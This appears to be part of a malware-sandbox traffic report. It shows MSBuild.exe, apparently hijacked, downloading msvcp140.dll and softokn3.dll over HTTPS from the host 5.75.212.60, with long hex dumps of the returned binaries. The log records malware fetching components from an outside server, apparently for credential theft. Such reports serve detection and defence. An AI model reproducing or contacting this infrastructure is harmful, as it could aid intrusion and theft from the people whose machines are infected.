                                                                                      2024-07-26 01:18:11 UTC16384INData Raw: 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff
                                                                                      Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                      2024-07-26 01:18:11 UTC16384INData Raw: c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85
                                                                                      Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                      2024-07-26 01:18:11 UTC16384INData Raw: 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b
                                                                                      Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                      2024-07-26 01:18:11 UTC16384INData Raw: ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc
                                                                                      Data Ascii: H) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                      2024-07-26 01:18:11 UTC16384INData Raw: 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9
                                                                                      Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                      2024-07-26 01:18:11 UTC16384INData Raw: 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89
                                                                                      Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$
                                                                                      2024-07-26 01:18:11 UTC16384INData Raw: fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83
                                                                                      Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                      2024-07-26 01:18:11 UTC16384INData Raw: 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0
                                                                                      Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      14192.168.2.4497505.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:12 UTC242OUTGET /msvcp140.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:12 UTC260INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:12 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 450024
                                                                                      Connection: close
                                                                                      Last-Modified: Friday, 26-Jul-2024 01:18:12 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-07-26 01:18:12 UTC16124INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                      2024-07-26 01:18:12 UTC16384INData Raw: 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72
                                                                                      Data Ascii: -bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr
                                                                                      2024-07-26 01:18:12 UTC16384INData Raw: 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff
                                                                                      Data Ascii: x{|L@DX}0}}M@4}0}}4M@tXM}0}}XM
                                                                                      2024-07-26 01:18:12 UTC16384INData Raw: 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd
                                                                                      Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                      2024-07-26 01:18:12 UTC16384INData Raw: 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0
                                                                                      Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                      2024-07-26 01:18:12 UTC16384INData Raw: 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57
                                                                                      Data Ascii: AUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSW
                                                                                      2024-07-26 01:18:12 UTC16384INData Raw: 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8
                                                                                      Data Ascii: E_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ
                                                                                      2024-07-26 01:18:12 UTC16384INData Raw: 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03
                                                                                      Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s
                                                                                      2024-07-26 01:18:12 UTC16384INData Raw: cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00
                                                                                      Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|i
                                                                                      2024-07-26 01:18:12 UTC16384INData Raw: 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01
                                                                                      Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      15192.168.2.4497515.75.212.604436512C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-07-26 01:18:13 UTC242OUTGET /softokn3.dll HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                      Host: 5.75.212.60
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-07-26 01:18:14 UTC260INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Fri, 26 Jul 2024 01:18:14 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 257872
                                                                                      Connection: close
                                                                                      Last-Modified: Friday, 26-Jul-2024 01:18:14 GMT
                                                                                      Cache-Control: no-store, no-cache
                                                                                      Accept-Ranges: bytes
                                                                                      2024-07-26 01:18:14 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                      2024-07-26 01:18:14 UTC16384INData Raw: 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81
